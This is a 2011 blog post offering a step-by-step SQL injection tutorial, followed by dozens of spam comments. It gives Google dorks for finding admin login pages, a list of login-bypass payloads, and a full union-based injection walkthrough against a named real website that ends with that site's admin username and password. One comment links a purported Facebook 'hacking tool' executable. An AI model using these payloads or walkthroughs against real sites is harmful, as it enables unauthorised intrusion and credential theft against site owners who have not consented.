Saturday, June 25, 2011

Complete Manual SQL Tutorial.

Introduction:
Hello every one .
I am going to share with one of the best of my tutorials here .

Now Let's begin!!

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:

Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'
So your input should look like this

username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in :D

PART 2
Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.
Download SQLI dorks list from here : http://www.mediafire.com/?y7v30lcj0kn8836
http://adf.ly/cjpJ <--- password is somewhere in it
PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this :
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add a '

So our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'
Press enter and you get some kind of error. The errors will vary...

Our page should look like that : (Click to View)
After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.
Our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--
If you get an error that means you should lower the number of columns .
Let's try 10.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--
The page opened normally that means the number of columns is between 10 and 14.
We try now 11.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--
The page opened normally too...
Let's try 12.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--
We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--
We should get numbers .

Our page should look like that : (Click to View)

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like that : (Click to View)

In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that : (Click to View)

Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin


Now we need to get the ASCII value of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html


Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :
Code:
tbladmin
Now remove the characters as & # ; and we add a comma "," between each number .
It should be like that:
Code:
116,98,108,97,100,109,105,110


Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
Our page should be like that:


Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like that:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin
Our page should look like that :


And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.
http://www.mediafire.com/?7qd7t6r3b13ccq4
http://adf.ly/cjpJ<---- the password is in it somewhere :)
And We're Done !

I hope you liked my tutorial .
ALL credits go to me !
Thanks for reading that thread.

44 comments:

H A NAZIR GILL said...

Amazing! I did not read such a good tutorial first
Thanks alot

kavita said...

I think wordpress is the best blogging platform available. I liked the design of your blog. Great going mate!
-Kelly
fat loss 4 idiots

Anonymous said...

Good stuff, but when trying to acces via FTP with the user pw, it doesn't accept them...

Avais Waseem said...

Thanks for such nice comments

Anonymous said...

but how I'm going to find the admin panel????????

Shoaib siddiqui said...

636f6c6c6174696f6e i got this after converting the text now what to do m confused.......

Anonymous said...

awe

Anonymous said...

http://www.mediafire.com/?y7v30lcj0kn8836

this file password....???

hacktheworld156 said...

i have facebook hacking tool for awesome facebook hacking install and enter facebook email id then enter randome generated password for 5 times after that victem facebook account is open
enjoy for hacking

https://hotfile.com/dl/163409838/03ddd2f/facebook.exe.html

sarah said...

Thanks for all the information, it was very helpful i really like that you are providing information on PHP and MYSQL with basic JAVASCRIPT,being enrolled in http://www.wiziq.com/course/5871-php-mysql-with-basic-javascript-integrated-course i was looking for such information online to assist me on php and mysql and your information helped me a lot. Thanks.

christi parks said...

Hello, i would like to ask that what is the benefits of sql training, what all topics should be covered and it is kinda bothering me … and has anyone studies from this course http://www.wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? or tell me any other guidance...
would really appreciate help… and Also i would like to thank for all the information you are providing on sql training.

nipasarker said...

View the Net Worth of Celebrities, Athletes, Rappers and other Famous Movie Stars. World's Most Comprehensive Celebrity Net Worth Encyclopedia
celebrity net worth
celebrities net worth

Anonymous said...

John Saladino's own apartment together with his slipcovered living area chairs with tie detailing as part of his favorite color quick loans you are able to use your cheap loan money to refurbish your own home or smarten-the kitchen and garden.

nipasarker said...

AppGenerate was created by a group of iOS, Android, and HTML5 developers who decided it was time for anyone to be able to build their own mobile apps. We believe the mobile revolution is here. In 2011, retailers like Amazon received more traffic from mobile devices than they did desktop and laptop computers. Just imagine that it's not just a big slice of traffic, it's more than 50%. Just like the dawn of the Internet revolution, if your business doesn't have a presence in mobile, you'll be left behind, or worse, you won't even exist.
app maker
app builder
mobile app builder software free
mobile app maker software
mobile app maker online
generate app

Anonymous said...

Hey there! Quick question that's totally off topic. Do you know how to make your site mobile friendly? My site looks weird when browsing from my iphone 4. I'm trying to
find a theme or plugin that might be able to correct this issue.
If you have any suggestions, please share. Appreciate it!


Also visit my site ロレックスレプリカ

Anonymous said...

This website really has all the information and facts I needed about
this subject and didn't know who to ask.

Here is my web site ... ロレックスコピー

Anonymous said...

Your method of explaining the whole thing in this paragraph is
actually pleasant, all be capable of without difficulty understand it,
Thanks a lot.

My blog post - http://www.hiarabs.com/blog/32868/that-to-calculate-points-for-weight-viewers-pointsplus

Anonymous said...

The health hazards of ΕМF's have been known cell phone for years, have b&#1077&#1077n utilizing keypads for input.

my blog :: ifourlocal.co.uk

Anonymous said...

Somе typeѕ оf unlocked phοne have two CPU &#1109 central pгоcessing units, ruled agaіnst hіm, and
cell phone that the wаггantless ѕearсh wаѕ valіd.


My web site; dien thoai

Anonymous said...

Excellent goods from you, man. I've understand your stuff previous to and you're just too magnificent.
I really like what you've acquired here, really like what you're saying
and the way in which you say it. You make it enjoyable and you still care for to keep it wise.
I cant wait to read far more from you. This is actually a tremendous site.


Feel free to visit my web blog winrar unlocker

Anonymous said...

Cool blog! Is your theme custom made or did you download it from somewhere?
A theme like yours with a few simple tweeks would really make my blog jump out.
Please let me know where you got your design.
Thanks a lot

Here is my web page ... book of raw online spielen

Anonymous said...

Remarkable! Its in fact awesome piece of writing,
I have got much clear idea regarding from this post.


Feel free to visit my web-site ... sharecash surveys

Anonymous said...

I am curious to find out what blog system you happen to be using?
I'm having some small security issues with my latest site and I'd
like to find something more secure. Do you
have any recommendations?

Here is my web page - www.monsterbeatsphones-vip.com

Anonymous said...

It's a shame you don't have a donate button! I'd without a doubt donate to this excellent blog! I guess for now i'll settle for book-marking and adding your RSS feed to my Google account.
I look forward to new updates and will talk about this site with my Facebook group.
Talk soon!

my web site :: monster ヘッドホン

Anonymous said...

I am really enjoying the theme/design of your weblog.
Do you ever run into any browser compatibility issues?
A handful of my blog visitors have complained about my site
not operating correctly in Explorer but looks great in Opera.

Do you have any recommendations to help fix this issue?

Look at my site - http://www.oakleyoutlet-sale.com

Anonymous said...

Excellent goods from you, man. I've understand your stuff previous to and you're just too
fantastic. I really like what you have acquired here, really like
what you are stating and the way in which you say it.

You make it entertaining and you still take care of
to keep it smart. I can not wait to read much more from you.

This is actually a terrific website.

my web site; ロレックスレプリカ

nipasarker said...

Electrocopia.com is a electronic online web store, which sells the cheapest electronics products to all customer on the internet.

camera,
digital camera,
samsung electronics,
camcorder,
online electronics,
apple iphone 5,
electronics store,
online electronics store,
sony electronics,
electronics store online
cameras,

nipasarker said...

Electrocopia.com is a electronic online web store, which sells the cheapest electronics products to all customer on the internet.

camera,
digital camera,
samsung electronics,
camcorder,
online electronics,
apple iphone 5,
electronics store,
online electronics store,
sony electronics,
electronics store online
cameras,

Anonymous said...

nice

Anonymous said...

If you want a Premium Minecraft Account check out this generator.
With it you can generate a unique Minecraft Premium Account which no one else has!

You can Download the Free Premium Minecraft Account Generator http://www.
get-minecraft-free.tk

Good day! I could have sworn I've visited this blog before but after looking at some of the articles I realized it's new to me.
Anyhow, I'm certainly delighted I found it and I'll be book-marking it and checking back regularly!

Anonymous said...

This program is intended to recover lost passwords for RAR/WinRAR
archives of versions 2.xx and 3.xx. http://www.winrarpasswordcracker.
com The free professional solution for recovering
lost passwords to RAR and WinRAR archives.

I've read a few excellent stuff here. Certainly worth bookmarking for revisiting. I surprise how much attempt you set to make one of these magnificent informative website.

Stop by my page ... Rar Password revovery

Anonymous said...

Download All Recent Games, Movies, Apps, Mobile Stuff and everything else for
free at http://gamesdownload4free.tk

You can download from the following categories

Full Version Applications for Android, iOS, MAC, Windows

Full Version Games for Linux, MAC, PC, PS3, Wii, Wii U, XBOX360 and other systems
Full Movies And Cinema Movies BDRiP, Cam, DVDRiP, DVDRiP Old,
DVDSCR, HDRiP, R5, SCR, Staff Picks, Telecine, Telesync, Workprint
Full Music Album MP3s and Music Videos Music, Albums,
iTunes, MViD, Singles/EPs
Full Version Ebooks eBook Magazines

Download all you want for free at http://gamesdownload4free.

tk

Here is my homepage console download

Anonymous said...

If you want a Premium Minecraft Account check out this generator.
With it you can generate a unique Minecraft Premium Account
which no one else has! You can Download the Free Premium
Minecraft Account Generator http://www.MinecraftDownload4Free.
tk

What i do not realize is actually how you're not really a lot more well-preferred than you might be right now. You're so intelligent.

You understand therefore significantly in the case of this subject,
made me for my part imagine it from numerous numerous angles.
Its like women and men don't seem to be involved until it's something to do with Lady
gaga! Your own stuffs great. All the time take care of it up!

Anonymous said...

Let me introduce you all to this wonderful product named http://www.

sharecash-bypass.tk Ubers AIO Downloader. You guys might
be thinking that what this tool is doing on a Sharecash Downloader website
and that this is all different, well, but no. After successfully running Sharecash
Downloader of mine for 2-3 months, I decided to make something
more unique and useful to you guys, so I came up with my AIO Downloader.
The speciality of this downloader is that it downloads almost
from all file-hosters along with Sharecash, Fileace and Dengee.

Anonymous said...

WOW just what I was searching for. Came here by searching for sharecash.
org downloader

my webpage; sharecash downloader

Anonymous said...

We absolutely love your blog and find a lot of your post's to be precisely what I'm looking for.
Do you offer guest writers to write content for yourself?
I wouldn't mind writing a post or elaborating on some of the subjects you write concerning here. Again, awesome blog!

Feel free to surf to my site: Adfocus Auto Clicker

Anonymous said...

Hello there I am so happy I found your web site, I really
found you by mistake, while I was searching on Bing for something else, Anyways I am here now and would just
like to say thank you for a incredible post and a all round thrilling blog (I also love the theme/design),
I don’t have time to read it all at the moment
but I have book-marked it and also included your RSS feeds, so when I have
time I will be back to read more, Please do keep up the awesome jo.



Here is my homepage - Nutra green coffee review

nipasarker said...

I contacted One Legal Solution because I was constantly being denied when applying for credit. Mr.Mireles assisted me and answered all of my questions during a free consultation. I then decided to move forward and hire One Legal Solution to restore my credit. It was the best investment I have ever made. My Credit Score is now above 700 which gave me the ability to purchase a new tahoe. Thank You One Legal Solution.
Credit Restoration | Credit Building | Raise Your Fico Score Now

nipasarker said...

I contacted One Legal Solution because I was constantly being denied when applying for credit. Mr.Mireles assisted me and answered all of my questions during a free consultation. I then decided to move forward and hire One Legal Solution to restore my credit. It was the best investment I have ever made. My Credit Score is now above 700 which gave me the ability to purchase a new tahoe. Thank You One Legal Solution.
Credit Restoration | Credit Building | Raise Your Fico Score Now

beverlye dugan said...

You can use a more info sale service to have parts of an image made transparent, while are parts are made opaque.

Nuha Sultana said...

When I read ande's tut on SQL Injection and one of relax's practical example,I didn't find them full. So,I searched the web and found this one.This tut explains everything about SQLi.
review

shamsher khan said...

Very nice post, impressive. its quite different from other posts. Thanks for sharing.
amazon coupon

Nikithar said...

It is an amazing post.Very useful to me.I liked it .And Swipe Your Credit Card And have Immediate cash With Cheapest Costs.
Provide Your ID Card Photo Copy As A Document Resistant.If you Want more details kindly Visit Here

Viswanadhan R said...

Advantageously, the post is really the sweetest on this notable topic. I concur with your conclusions and definitely will thirstily look forward to your upcoming updates. Saying thanks definitely will not simply just be sufficient, for the fantasti c clarity in your writing. I definitely will at once grab your rss feed to stay abreast of any updates. Genuine work and also much success in your business dealings! wikipedia reference

Post a Comment

You can Ask anything that you like!!!!

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | cna certification